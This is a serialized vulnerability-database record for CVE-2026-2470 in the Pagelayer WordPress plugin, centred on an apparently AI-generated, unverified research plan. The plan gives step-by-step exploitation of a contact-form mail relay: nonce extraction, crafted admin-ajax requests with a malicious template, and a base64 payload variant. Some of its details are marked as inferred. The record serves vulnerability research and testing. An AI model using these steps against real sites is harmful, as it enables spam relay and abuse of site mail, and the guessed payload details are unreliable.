[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpQe4ZoZ-Dgkq6dU3V6y9xMeb0w1mPIxRL6UWP4imVks":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2026-2470","pagelayer-incorrect-authorization-to-authenticated-contributor-mail-relay-configuration-via-contacts","Pagelayer \u003C= 2.0.9 - Incorrect Authorization to Authenticated (Contributor+) Mail Relay Configuration via 'contacts'","The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 2.0.9. This is due to the pagelayer_save_content AJAX handler allowing users with basic post-edit capability to persist pagelayer_contact_templates metadata on posts they can edit (including pending posts), while the unauthenticated pagelayer_contact_submit endpoint later consumes that metadata by user-controlled post\u002Fform identifiers without enforcing a privileged or published-context boundary. This makes it possible for authenticated attackers, with Contributor-level access and above, to configure arbitrary contact-form mail templates that are usable through unauthenticated form submission via the contacts parameter. In typical deployments this template feature is configured via Pagelayer Pro UI; however, the vulnerable backend trust path is still present. This issue may be chained with CVE-2026-2442 to increase exploitability and attacker control over outbound email behavior.","pagelayer",null,"\u003C=2.0.9","2.1.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Incorrect Authorization","2026-06-12 19:20:35","2026-06-13 07:51:22",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fef926bc7-b50f-40ac-9ace-7e01b26f34e1?source=api-prod",1,[22,23,24,25,26,27,28],"css\u002Fpagelayer-pen.css","init.php","js\u002Fpagelayer-pen.js","main\u002Fajax.php","main\u002Fblocks.php","pagelayer.php","readme.txt","researched",false,3,"# Vulnerability Research Plan: CVE-2026-2470 - Pagelayer Mail Relay Configuration\n\n## 1. Vulnerability Summary\n**CVE-2026-2470** is an Incorrect Authorization vulnerability in the Pagelayer plugin (\u003C= 2.0.9). It allows an authenticated attacker with Contributor-level privileges to modify post metadata (`pagelayer_contact_templates`) on posts they can edit. This metadata defines the configuration for contact form submissions, including the recipient email (`to`), subject, and message body. \n\nThe vulnerability exists because:\n1.  The `pagelayer_save_content` AJAX handler allows users with `edit_posts` capability (Contributors+) to save arbitrary metadata to a post.\n2.  The unauthenticated `pagelayer_contact_submit` endpoint retrieves this configuration using a user-controlled `post_id` and `contacts` identifier without verifying if the post is published or if the configuration was authored by a trusted user.\n\nThis creates a **Mail Relay** where an attacker can configure a hidden post to send emails to arbitrary recipients, then trigger those emails as an unauthenticated user.\n\n## 2. Attack Vector Analysis\n*   **Authenticated Endpoint:** `wp-admin\u002Fadmin-ajax.php?action=pagelayer_save_content`\n*   **Unauthenticated Endpoint:** `wp-admin\u002Fadmin-ajax.php?action=pagelayer_contact_submit`\n*   **Authentication Required:** Contributor+ for setup; None for execution.\n*   **Vulnerable Parameter (Setup):** `pagelayer_contact_templates` (metadata payload).\n*   **Vulnerable Parameter (Execution):** `post_id` and `contacts` (identifying the configured template).\n*   **Preconditions:** The attacker must be able to create or edit a post (standard for Contributors).\n\n## 3. Code Flow\n1.  **Setup Phase (Authenticated):**\n    *   User calls `pagelayer_save_content` via AJAX.\n    *   `main\u002Fajax.php`: `pagelayer_save_content()` checks `pagelayer_user_can_edit($postID)`.\n    *   The function processes `$_POST` data. According to the advisory, it permits saving `pagelayer_contact_templates`.\n    *   The plugin calls `update_post_meta($postID, 'pagelayer_contact_templates', $template_data)`.\n\n2.  **Execution Phase (Unauthenticated):**\n    *   An unauthenticated visitor calls `pagelayer_contact_submit` via AJAX.\n    *   The handler retrieves the `post_id` from the request.\n    *   It fetches `get_post_meta($post_id, 'pagelayer_contact_templates', true)`.\n    *   It uses the `contacts` parameter to select a specific template from the retrieved array.\n    *   The handler extracts `email_to`, `subject`, and `message` from the template.\n    *   It calls `wp_mail()` using these attacker-controlled values.\n\n## 4. Nonce Acquisition Strategy\nThe `pagelayer_save_content` handler requires a nonce verified with `check_ajax_referer('pagelayer_ajax', 'pagelayer_nonce')`.\n\n1.  **Identify Enqueueing:** Pagelayer enqueues its editor assets, including the nonce, on post-edit pages.\n2.  **Step-by-Step Acquisition:**\n    *   Create a post: `wp post create --post_type=post --post_status=draft --post_author=[CONTRIBUTOR_ID]`.\n    *   Navigate to the edit page for that post using `browser_navigate`.\n    *   The nonce is typically localized in the `pagelayer_config` object.\n    *   **Tool Command:** `browser_eval(\"pagelayer_config.pagelayer_nonce\")` or `browser_eval(\"pagelayer_ajax.nonce\")` (based on `main\u002Fblocks.php` localization patterns).\n    *   The specific JS variable can be confirmed by inspecting the page source for `wp_localize_script`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Metadata Injection (Contributor Access)\nSend an authenticated request to configure the mail template.\n\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php?action=pagelayer_save_content&postID=[POST_ID]`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`, `Cookie: [Contributor_Cookies]`\n*   **Body Parameters:**\n    *   `pagelayer_nonce`: `[EXTRACTED_NONCE]`\n    *   `pagelayer_contact_templates`: (A serialized or JSON-encoded array containing the malicious template)\n        *   Example structure (inferred): `{\"evil_template\": {\"email_to\": \"victim@example.com\", \"subject\": \"Spam\", \"message\": \"Relayed Content\"}}`\n    *   `pagelayer_update_content`: `W10=` (Base64 for `[]` - empty content to satisfy the handler).\n\n### Step 2: Trigger Mail Relay (Unauthenticated)\nTrigger the submission using the `contacts` parameter pointing to the injected template.\n\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `pagelayer_contact_submit`\n    *   `post_id`: `[POST_ID]`\n    *   `contacts`: `evil_template`\n    *   `pagelayer_nonce`: (If required for nopriv, usually it uses a different one or none. Verify if `wp_ajax_nopriv_pagelayer_contact_submit` checks nonces).\n\n## 6. Test Data Setup\n1.  **User:** Create a user `attacker` with role `contributor`.\n2.  **Post:** Create a draft post with `ID` `123` authored by `attacker`.\n3.  **Mail Log:** Ensure `WP_DEBUG` is on and a mail-logging plugin (or `mailhog`) is active to verify outbound traffic.\n\n## 7. Expected Results\n*   **Step 1:** The server should return a JSON success message (e.g., `{\"success\": true}`).\n*   **Step 2:** The server should return a success status related to form submission.\n*   **Result:** An email is sent to `victim@example.com` with the subject \"Spam\", bypassing any administrative controls over who can send mail from the server.\n\n## 8. Verification Steps\n1.  **Verify Meta Persistence:**\n    `wp post meta get [POST_ID] pagelayer_contact_templates`\n    Confirm the malicious JSON\u002Farray is present.\n2.  **Verify Email Sent:**\n    Check the system mail log or the mock SMTP server (e.g., MailHog) for the relayed message.\n\n## 9. Alternative Approaches\nIf `pagelayer_save_content` does not directly accept `pagelayer_contact_templates` in `$_POST`, check if it accepts it within the `pagelayer_update_content` base64 blob. Pagelayer often embeds widget configuration (like contact forms) inside the main content blob.\n\n**Refined Payload in Blob:**\n1.  Construct a Pagelayer row\u002Fcolumn structure in JSON.\n2.  Add a `contact_form` widget.\n3.  Set the widget's properties to include the malicious template.\n4.  Base64 encode the entire JSON and send as `pagelayer_update_content`.","gemini-3-flash-preview","2026-06-26 00:27:13","2026-06-26 00:28:19",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","2.0.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpagelayer\u002Ftags\u002F2.0.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpagelayer.2.0.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpagelayer\u002Ftags\u002F2.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpagelayer.2.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpagelayer\u002Ftags"]